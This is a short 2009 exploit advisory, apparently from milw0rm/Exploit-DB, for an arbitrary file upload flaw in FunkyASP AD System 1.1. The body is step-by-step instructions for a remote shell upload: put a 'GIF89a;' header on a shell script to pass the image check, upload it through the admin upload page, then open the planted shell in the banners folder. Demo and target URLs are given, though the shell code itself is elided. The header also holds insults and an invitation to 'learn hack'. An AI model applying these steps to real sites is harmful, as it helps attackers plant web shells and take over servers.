FunkyASP AD System 1.1 - Arbitrary File Upload

EDB-ID:

8397

CVE:

N/A


Author:

ZoRLu

Type:

webapps


Platform:

ASP

Date:

2009-04-10


[~] FunkyASP AD System v1.1 Remote Shell Upload
[~]
[~] script: http://www.funkyasp.co.uk/cats.asp?id=1&currency=GBP
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 04.04.2009
[~]
[~] Home: yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~] contact: trt-turk@hotmail.com
[~] 
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve Ulkumuz icin Buyuk KayIp Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------


first register to site 

you add this code your shell to head 

GIF89a; 

example your_shell.asp:

GIF89a;
<?

...

...

...

?>

and save your_sheell.asp

you go to here:

http://yildirimordulari.com/demo/banner/admin.asp?action=upload

and your shell here:

http://yildirimordulari.com/demo/banner/banners/z.asp

for demo:

http://demo.funkyasp.com/demo/banner/admin.asp?action=upload

shell:

http://demo.funkyasp.com/demo/banner/banners/z.asp


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-04-10]